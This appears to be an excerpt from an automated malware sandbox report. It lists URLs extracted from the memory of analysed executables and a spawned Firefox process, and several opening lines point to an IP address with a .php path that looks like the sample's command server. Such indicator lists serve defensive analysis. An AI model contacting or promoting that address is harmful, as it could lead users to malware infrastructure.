Source: file.exe, 00000000.00000002.2380791496.00000000005AD000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://85.28.47.315499d72b3a3e55be.phposition:
Source: 624f4d727e.exe, 00000018.00000002.2899807297.00000000025EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.315TJS
Source: 624f4d727e.exe, 00000014.00000002.2765136724.000000000256B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31i
Source: 624f4d727e.exe, 00000014.00000002.2765136724.0000000002536000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31lfC
Source: 624f4d727e.exe, 00000018.00000002.2899807297.00000000025EB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31lyF
Source: firefox.exe, 0000001E.00000003.2974249356.00000270D7EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3043752217.00000270D7EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%s
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%shttps://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%shttps://poczta.interia.pl/mh/?mailto=%shttp://win.ma
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA1C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
Source: firefox.exe, 0000001E.00000002.3071808582.00000270DB742000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3103512040.00000270E3DAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3096588402.00000270E2065000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3100479236.00000270E2312000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3097214328.00000270E2166000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 0000001E.00000002.3100681543.00000270E234C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/
Source: firefox.exe, 0000001E.00000002.3097214328.00000270E2132000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3096588402.00000270E2065000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3083929588.00000270DCB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.htmlACTIVITY_SUBTYPE_REQUEST_BODY_SENT_startDetection/urlF
Source: firefox.exe, 0000001E.00000003.2998160641.00000270E41EB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3083929588.00000270DCB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 0000001E.00000003.2998160641.00000270E41EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 0000001E.00000002.3045499741.00000270D81B0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListenerFailed
Source: firefox.exe, 0000001E.00000002.3045499741.00000270D81B0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListenerThe
Source: firefox.exe, 0000001E.00000002.3032836106.00000270D618A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/common
Source: firefox.exe, 0000001E.00000002.3032836106.00000270D618A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/math
Source: firefox.exe, 0000001E.00000002.3032836106.00000270D618A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/sets
Source: firefox.exe, 0000001E.00000002.3105353259.00000270E4012000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3071145346.00000270DB5D9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3033402856.00000270D62A8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3105353259.00000270E4024000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3104091280.00000270E3FF0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3098800866.00000270E2238000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3085513675.00000270DDAF7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3042238317.00000270D7CFB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3104091280.00000270E3FD5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2974682541.00000270DB6EC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3009455777.00000270E4061000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3087332031.00000270DDB0C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3087332031.00000270DDB42000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2975074362.00000270DB6CE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3080838293.00000270DC8CD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3085513675.00000270DDAAA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3080838293.00000270DC87E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3020902581.00000270DC805000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3055070997.00000270DA603000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2985790168.00000270E440E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3071509681.00000270DB6EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000008DC000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 00000017.00000000.2762168634.0000000000B81000.00000080.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000008DC000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000000.2937508935.0000000000B81000.00000080.00000001.01000000.00000011.sdmp String found in binary or memory: http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000008DC000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 00000017.00000000.2762168634.0000000000B81000.00000080.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000008DC000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000000.2937508935.0000000000B81000.00000080.00000001.01000000.00000011.sdmp String found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr
Source: bdb44f72d9.exe, 00000017.00000002.3246133657.00000000008DC000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 00000017.00000000.2762168634.0000000000B81000.00000080.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000002.3245573967.00000000008DC000.00000040.00000001.01000000.00000011.sdmp, bdb44f72d9.exe, 0000001B.00000000.2937508935.0000000000B81000.00000080.00000001.01000000.00000011.sdmp String found in binary or memory: http://pki-ocsp.symauth.com0
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2974249356.00000270D7EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3043752217.00000270D7EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA1C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
Source: firefox.exe, 0000001E.00000002.3085513675.00000270DDAAA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3087332031.00000270DDB31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0.
Source: firefox.exe, 0000001E.00000002.3105629754.00000270E4075000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3060815323.00000270DADD3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0W
Source: firefox.exe, 0000001E.00000002.3085513675.00000270DDAAA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3105629754.00000270E4075000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3060815323.00000270DADD3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3087332031.00000270DDB31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2974249356.00000270D7EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3043752217.00000270D7EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA1C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2974249356.00000270D7EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3043752217.00000270D7EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA1C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
Source: file.exe, file.exe, 00000000.00000002.2401826383.000000006C61D000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-update
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-updatePREF_APP_UPDATE_BACKGROUNDMAXERRORSapp.update.checkOnlyInstanc
Source: firefox.exe, 0000001E.00000002.3108461657.00000270E4380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/2005/app-updatex
Source: firefox.exe, 0000001E.00000002.3081525186.00000270DC960000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3078302717.00000270DC78F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3081525186.00000270DC903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3077664321.00000270DC668000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3047918500.00000270D8B83000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3058796603.00000270DA903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.3000078726.00000270DAF67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3058796603.00000270DA956000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3058796603.00000270DA971000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3067377430.00000270DAF67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D9A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3081525186.00000270DC991000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DA7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3060815323.00000270DADD3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 0000001E.00000002.3081525186.00000270DC960000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul5G
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://browser/content/parent/ext-chr
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://extensions/content/schemas/ide
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://global/content/elements/browse
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulconnectedCallback/this._mutationObserve
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6DAD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulhttp://www.mozilla.org/keymaster/gateke
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulresource://gre/modules/DownloadIntegrat
Source: file.exe, 00000000.00000002.2391758530.000000001CBA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2401548515.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: firefox.exe, 0000001E.00000002.3069796496.00000270DB2B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.youtube.com/
Source: firefox.exe, 0000001E.00000002.3105629754.00000270E4075000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3098800866.00000270E2247000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3060815323.00000270DAD33000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: firefox.exe, 0000001E.00000002.3105629754.00000270E4075000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3098800866.00000270E2247000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3060815323.00000270DAD33000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.malware-error.mozilla.com/?url=
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-error.mozilla.com/?url=
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://%LOCALE%.phish-report.mozilla.com/?url=
Source: firefox.exe, 0000001E.00000003.2966388903.00000270DA66B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2965350403.00000270DA400000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2965635133.00000270DA61C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2965901975.00000270DA636000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2966671923.00000270DA683000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3045412001.00000270D8120000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3100479236.00000270E2312000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2966157719.00000270DA650000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.duckduckgo.com/ac/INHIBIT_PERSISTENT_CACHINGLOAD_ANONYMOUS_ALLOW_CLIENT_CERTget
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.ca
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://account.bellmedia.cagetLocalizedFragment/partIndex
Source: firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://accounts.firefox.com/settings/clients
Source: firefox.exe, 0000001E.00000002.3105629754.00000270E40C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.firefox.comK
Source: firefox.exe, 0000001E.00000002.3047918500.00000270D8B4C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000026.00000002.3388160352.0000027742E52000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 0000001E.00000002.3060815323.00000270DADB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3067558634.00000270DB024000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3066978967.00000270DAF10000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3066978967.00000270DAF08000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3060815323.00000270DADD3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 0000001E.00000002.3114150940.00001A176F100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113615943.00000EEEADD04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3098800866.00000270E226E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://allegro.pl/
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3113713962.00001252B7304000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://amazon.com
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://api.accounts.firefox.com/v1
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: firefox.exe, 0000001E.00000002.3097214328.00000270E2132000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: firefox.exe, 0000001E.00000002.3031269537.00000270C9B6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3036698382.00000270D6D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3097214328.00000270E2173000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: file.exe, 00000000.00000002.2382069321.00000000024FD000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA15F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3032836106.00000270D61AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: file.exe, 00000000.00000002.2382069321.00000000024FD000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA15F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3032836106.00000270D61AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: firefox.exe, 0000001E.00000003.3009281847.00000270E40E4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
Source: firefox.exe, 0000001E.00000003.3009281847.00000270E40E4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
Source: firefox.exe, 0000001E.00000003.3009281847.00000270E40E4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
Source: firefox.exe, 0000001E.00000003.3009281847.00000270E40E4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3066978967.00000270DAF1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
Source: file.exe, 00000000.00000002.2382069321.00000000024FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000002.2382069321.00000000024FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2965350403.00000270DA400000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2965635133.00000270DA61C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2965901975.00000270DA636000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000003.2966671923.00000270DA683000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3045412001.00000270D8120000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000003.2966157719.00000270DA650000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 0000001E.00000002.3100681543.00000270E233A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net
Source: firefox.exe, 0000001E.00000003.3011652184.00000270E2344000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3033402856.00000270D62FB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-202
Source: firefox.exe, 0000001E.00000002.3041771993.00000270D7A90000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://content.cdn.mozilla.net
Source: file.exe, 00000000.00000002.2382069321.00000000024FD000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA15F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3032836106.00000270D61AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36
